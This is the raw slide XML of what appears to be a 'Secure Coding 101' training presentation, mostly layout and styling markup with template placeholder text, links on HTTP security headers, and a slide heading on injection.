            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="3044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AA1830"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform: Shape 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{948EEE69-3616-419F-BB35-1F05FACC0AB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="3806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500D29"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Freeform: Shape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18EEC0A3-7F93-4031-A8F1-ADD0383D5305}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="3425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96172B"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform: Shape 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5069A6B-9BB2-476A-BCE6-C8433FBB4A28}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="4187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650E35"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Freeform: Shape 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7678D2E2-AF18-42E0-898F-16480F3ACCB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="1520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BE172B"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Freeform: Shape 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A26D7935-17B1-43A0-9B38-8C04FED80733}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="2282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EF7721"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Freeform: Shape 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72716AF1-2642-4236-90C5-547B5CB32F5A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="1901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DC0A34"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Freeform: Shape 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF2413FC-ABF5-4257-A414-E4589D1DF571}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="2663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EA5728"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Freeform: Shape 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59A9C6E8-6C2C-4C4B-87B7-69F7C88A7A94}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="4568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88133E"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Freeform: Shape 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A8AA545-BB1D-4415-820F-4134EF1551C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="5330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E8365C"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Freeform: Shape 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58D2EDC5-E7F6-4DAE-A3E3-64F2460D0C74}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="4949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AF184C"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Freeform: Shape 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AAA8A36-8E6C-4A8D-A807-EEFA4B5026D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="5711904"/>
              <a:ext cx="127000" cy="381000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3096 w 127000"/>
                <a:gd name="connsiteY0" fmla="*/ 3096 h 381000"/>
                <a:gd name="connsiteX1" fmla="*/ 128826 w 127000"/>
                <a:gd name="connsiteY1" fmla="*/ 3096 h 381000"/>
                <a:gd name="connsiteX2" fmla="*/ 128826 w 127000"/>
                <a:gd name="connsiteY2" fmla="*/ 384096 h 381000"/>
                <a:gd name="connsiteX3" fmla="*/ 3096 w 127000"/>
                <a:gd name="connsiteY3" fmla="*/ 384096 h 381000"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="127000" h="381000">
                  <a:moveTo>
                    <a:pt x="3096" y="3096"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128826" y="3096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128826" y="384096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3096" y="384096"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="EB5A79"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3570FDA4-5188-4CAC-BA53-A172F440343F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="445811"/>
            <a:ext cx="11337925" cy="710639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A74E863-F511-418D-9981-5E0855C69C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="1449387"/>
            <a:ext cx="11337925" cy="4679951"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add first level body copy</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2" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D357B978-5EA7-4B3C-BB4B-6742174E30D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349812" y="6538782"/>
            <a:ext cx="401714" cy="154068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{13D9B5B3-34F1-4574-8603-EBF049354228}" type="slidenum">
              <a:rPr lang="en-GB" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-GB" sz="850" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  |</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Straight Connector 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B838113-2299-44E3-AB16-DF8AFC74CDCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="6373632"/>
            <a:ext cx="11337925" cy="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5B7EC5D-2467-4F15-A6D7-54466639DABC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="796350" y="6538782"/>
            <a:ext cx="5040000" cy="154069"/>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50" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presentation title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Callout: Line 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AB0EA62-0C7E-49A8-B8B7-0190BA197CE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="12578230" y="2026872"/>
            <a:ext cx="2038121" cy="4828032"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 88258"/>
              <a:gd name="adj2" fmla="val -4744"/>
              <a:gd name="adj3" fmla="val 88322"/>
              <a:gd name="adj4" fmla="val -13328"/>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144000" rIns="144000" bIns="144000" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Update presentation title and classification</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Click on ‘View’ on the menu bar</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Scroll to main master slide numbered ‘2’</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Insert document title in the text box on the left hand side of the slide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="265113" indent="-265113" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Choose one of the document classification options on the right hand side and remove the remaining text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="265113" indent="-265113" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1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3131948"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483811" r:id="rId1"/>
    <p:sldLayoutId id="2147483822" r:id="rId2"/>
    <p:sldLayoutId id="2147483821" r:id="rId3"/>
    <p:sldLayoutId id="2147483814" r:id="rId4"/>
    <p:sldLayoutId id="2147483813" r:id="rId5"/>
    <p:sldLayoutId id="2147483847" r:id="rId6"/>
    <p:sldLayoutId id="2147483815" r:id="rId7"/>
    <p:sldLayoutId id="2147483848" r:id="rId8"/>
    <p:sldLayoutId id="2147483839" r:id="rId9"/>
    <p:sldLayoutId id="2147483837" r:id="rId10"/>
    <p:sldLayoutId id="2147483838" r:id="rId11"/>
    <p:sldLayoutId id="2147483845" r:id="rId12"/>
    <p:sldLayoutId id="2147483849" r:id="rId13"/>
    <p:sldLayoutId id="2147483850" r:id="rId14"/>
    <p:sldLayoutId id="2147483846" r:id="rId15"/>
    <p:sldLayoutId id="2147483851" r:id="rId16"/>
    <p:sldLayoutId id="2147483816" r:id="rId17"/>
    <p:sldLayoutId id="2147483842" r:id="rId18"/>
    <p:sldLayoutId id="2147483841" r:id="rId19"/>
    <p:sldLayoutId id="2147483843" r:id="rId20"/>
    <p:sldLayoutId id="2147483844" r:id="rId21"/>
    <p:sldLayoutId id="2147483817" r:id="rId22"/>
    <p:sldLayoutId id="2147483832" r:id="rId23"/>
    <p:sldLayoutId id="2147483833" r:id="rId24"/>
    <p:sldLayoutId id="2147483834" r:id="rId25"/>
    <p:sldLayoutId id="2147483835" r:id="rId26"/>
    <p:sldLayoutId id="2147483826" r:id="rId27"/>
    <p:sldLayoutId id="2147483824" r:id="rId28"/>
    <p:sldLayoutId id="2147483836" r:id="rId29"/>
    <p:sldLayoutId id="2147483829" r:id="rId30"/>
    <p:sldLayoutId id="2147483827" r:id="rId31"/>
    <p:sldLayoutId id="2147483825" r:id="rId32"/>
    <p:sldLayoutId id="2147483828" r:id="rId33"/>
    <p:sldLayoutId id="2147483820" r:id="rId34"/>
    <p:sldLayoutId id="2147483852" r:id="rId35"/>
    <p:sldLayoutId id="2147483818" r:id="rId36"/>
    <p:sldLayoutId id="2147483830" r:id="rId37"/>
    <p:sldLayoutId id="2147483831" r:id="rId38"/>
    <p:sldLayoutId id="2147483819" r:id="rId39"/>
    <p:sldLayoutId id="2147483823" r:id="rId40"/>
    <p:sldLayoutId id="2147483853" r:id="rId41"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3200" b="1" i="0" kern="1200" cap="none" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx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78" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="226">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="3861">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="7368">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="91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hyperlink" Target="https://securityheaders.com/" TargetMode="External"/><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scotthelme.co.uk/hardening-your-http-response-headers/#x-frame-option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BF367-131A-416B-AF1B-B4C9B71D9051}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="1791636"/>
            <a:ext cx="7166539" cy="1637364"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Secure Coding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AA59A23-4183-4A8A-810F-343F59A03C1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="3446929"/>
            <a:ext cx="7166539" cy="732413"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2370545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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="3134191"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1. Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A916BB7-A188-4DBC-BB80-196B2EAC5F36}"/>
